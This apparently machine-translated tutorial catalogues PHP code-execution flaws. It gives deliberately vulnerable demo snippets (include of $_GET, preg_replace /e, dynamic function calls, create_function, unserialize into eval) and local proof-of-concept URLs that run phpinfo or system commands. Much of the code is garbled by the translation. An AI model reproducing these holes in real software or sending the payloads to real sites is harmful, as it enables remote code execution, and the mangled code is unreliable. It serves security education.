PHP Code Execution Vulnerability Summary

A feast for PHP security enthusiasts Month of PHP security. I read a lot of articles on PHP-security and shared them. They are all idols. From: http://hi.baidu.com/menzhi007 Code execution function Functions that can execute code in PHP. Such as eval (), assert (), ", system (), exec (), shell_exec (), passthru (), Escapeshellcmd (), pcntl_exec (), etc. DEMO code 1.1: <? PHP Echo 'dir '; ?> 2. File Inclusion code injection File contains code injection of functions under specific conditions, such as include (), include_once (), require (), and require_once (). When allow_url_include = on and PHP version> = 5.2.0, code injection occurs. DEMO code 2.1: <? PHP Include ($ _ Get ['a']); ?> Access http: // 127.0.0.1/include. php? A = data: text/plain, % 3C? PHP % 20 phpinfo % 28% 29 ;? % 3E: Run phpinfo (). Three-Regular Expression matching code injection Code injection caused by the well-known preg_replace () function. When the/e pattern modifier exists in pattern, code execution is allowed. We will discuss this in three cases. 3.1 preg_replace () pattern parameter Injection Pattern is the code injection of the first parameter. When magic_quotes_gpc = off, the code is executed. DEMO code 3.1: <? PHP Echo $ Regexp = $ _ Get ['reg ']; $ Var = '<php> phpinfo () </php> '; Preg_replace ("/<php> (.*?) $ Regexp ", '\ 1', $ var ); ?> Access http: // 127.0.0.1/preg_replace1.php? Reg = % 3C \/PHP % 3E/e that is Run phpinfo (). 3.2 preg_replace () Replacement parameter Injection Replacement is the code injection of the second parameter, resulting in code execution. DEMO code 3.2: <? Preg_replace ("/menzhi007/E", $ _ Get ['H'], "jutst test "); ?> When we submit http: // 127.0.0.1/preg_replace2.php? H = phpinfo () that is Run phpinfo (). 3.3 preg_replace () injection of the third parameter We construct the subject parameter to execute the code. Submit: http: // 127.0.0.1/preg_replace3.php? H = [PHP] phpinfo () [/PHP] Or http: // 127.0.0.1/preg_replace3.php? H = [PHP] $ {phpinfo % 28% 29} [/PHP] cause code execution DEMO code 3.3: <? Preg_replace ("/\ s * \ [PHP \] (. + ?) \ [\/PHP \] \ s */ies "," \ 1 ", $ _ Get ['H']); ?> 4. Dynamic Code Execution 4.1 dynamic variable Code Execution DEMO code 4.1: <? PHP $ Dyn_func = $ _ Get ['dyn _ func']; $ Argument = $ _ Get ['argument']; $ Dyn_func ($ argument ); ?> We submit http: // 127.0.0.1/dyn_func.php? Dyn_func = System & amp; argument = ipconfig execute the ipconfig command 4.2 Dynamic Function Code Execution DEMO code 4.2: <? PHP $ Foobar = $ _ Get ['foobar']; $ Dyn_func = create_function ('$ foobar', "echo $ foobar ;"); $ Dyn_func ("); ?> We submit http: // 127.0.0.1/create_function.php? Foobar = SYSTEM % 28dir % 29 run the Dir command Five others 5.1 code execution of the ob_start () function DEMO code 5.1: <? PHP $ Foobar = 'system '; Ob_start ($ foobar ); Echo 'dir '; Ob_end_flush (); ?> 5.2 code execution of the array_map () function DEMO code 5.2: <? PHP $ Evil_callback = $ _ Get ['callback']; $ Some_array = array (0, 1, 2, 3 ); $ New_array = array_map ($ evil_callback, $ some_array ); ?> We submit http: // 127.0.0.1/array_map.php? Callback = phpinfo: Execute phpinfo (). 5.3 unserialize () and eval () Unserialize () is a function with high usage in PHP. Improper use of unserialize () may cause security risks. (Black brother that challenge 2 http://hi.baidu.com/hi_heige/blo... 5b18f499250a9b.html) DEMO code 5.3: <? PHP Class Example { VaR $ Var = "; Function _ destruct (){ Eval ($ this-> var ); } } Unserialize ($ _ Get ['saved _ Code']); ?> We submit http: // 127.0.0.1/unserialize. php? Saved_code = O: 7: % 22 example % 22: 1: {s: 3: % 22var % 22; S: 10: % 22 phpinfo % 28% 29; % 22 ;} Execute phpinfo (). 5.4 functions that may easily cause security problems There are many functions of the same type Array_map () Usort (), uasort (), uksort () Array_filter () Array_reduce () Array_diff_uassoc (), array_diff_ukey () Array_udiff (), array_udiff_assoc (), array_udiff_uassoc () Array_intersect_assoc (), array_intersect_uassoc () Array_uintersect (), array_uintersect_assoc (), array_uintersect_uassoc () Array_walk (), array_pai_recursive () Xml_set_character_data_handler () Xml_set_default_handler () Xml_set_element_handler () Xml_set_end_namespace_decl_handler () Xml_set_external_entity_ref_handler () Xml_set_notation_decl_handler () Xml_set_processing_instruction_handler () Xml_set_start_namespace_decl_handler () Xml_set_unparsed_entity_decl_handler () Stream_filter_register () Set_error_handler () Register_shutdown_function () Register_tick_function ()